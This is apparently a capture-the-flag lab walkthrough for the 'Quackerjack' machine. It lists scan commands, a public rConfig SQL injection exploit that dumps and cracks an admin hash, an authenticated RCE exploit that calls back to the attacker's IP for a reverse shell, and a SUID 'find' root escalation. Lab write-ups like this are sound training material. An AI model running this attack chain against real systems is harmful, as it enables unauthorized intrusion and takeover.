																							    Quackerjack Walkthrough
																										
Attacker's Machine: 192.168.49.68
Victim's Machine: 192.168.68.57
export IP=192.168.68.57
	
1. nmap -Pn -p- -n  --min-rate 1000 $IP --stats-every=5s

21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
8081/tcp open  blackice-icecap


3. nmap -Pn -n -sC -sV -p21,22,80,111,139,445,3306,8081 $IP --open --stats-every=5s -oN results.txt

21/tcp   open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Apache HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp  open  netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open  mysql       MariaDB (unauthorized)
8081/tcp open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16

Service Info: Host: QUACKERJACK; OS: Unix


3. nmap -sU -n -Pn $IP --top-ports=100 --stats-every=5s --min-rate 1000 
 <!-- nothing -->
 
Vulnerability Assessment

nmap -n $IP -p 80 -sV --script vuln --stats-every=5s 

http-enum: 
/icons/: Potentially interesting folder w/ directory listing

ffuf -c -w /usr/share/wordlists/last_resort.txt -u http://$IP/FUZZ -t 500 -mc 200 -fs 1415 -fc 404

 <!-- nothing -->

nikto --url $IP

PHP/5.4.16 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
OpenSSL/1.0.2k-fips appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
HTTP TRACE method is active which suggests the host is vulnerable to XST

Port 21
wget -m --no-passive ftp://anonymous:anonymous@$IP          // can't get anything

Port 139,445

enum4linux -a $IP
<!-- nothing -->

Port 3306
<!-- nothing -->

Port 8081

https://192.168.68.57:8081/login.php        // rConfig - Configuration Management -- Version 3.9.4  

searchsploit rconfig

rConfig 3.9 - 'searchColumn' SQL Injection                                                                                                           | php/webapps/48208.py

python3 48208.py https://192.168.68.57:8081
[+] Extracting the current DB name :
rconfig
[+] Extracting 10 first users :
admin:1:dc40b85276a1f4d7cb35f154236aa1b2

hash-identifier dc40b85276a1f4d7cb35f154236aa1b2
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

john --format=raw-md5 hash.txt              //  abgrtyu

https://crackstation.net/                                 //  abgrtyu

Now that we have credentails let's use an RCE exploit that required credentials.

searchsploit rconfig
rConfig 3.9.3 - Authenticated Remote Code Execution                                                                                                  | php/webapps/47982.py

./rconfig_exploit.py https://target username password yourIP yourPort

nc -lvnp 80
python3 47982.py https://$IP:8081 admin abgrtyu 192.168.49.68 80

Got Shell!

cd /home/rconfig
cat local.txt                     // f72eb80e6f381b2a98474d2421f1edde

Privilege escalation

find / -perm -u=s -type f 2>/dev/null

/usr/bin/find
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/fusermount
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper

/usr/bin/find . -exec /bin/sh -p \; -quit

cd /root
cat proof.txt        //  Flag:    80dddae45ef90e35dfedcf6755929e91
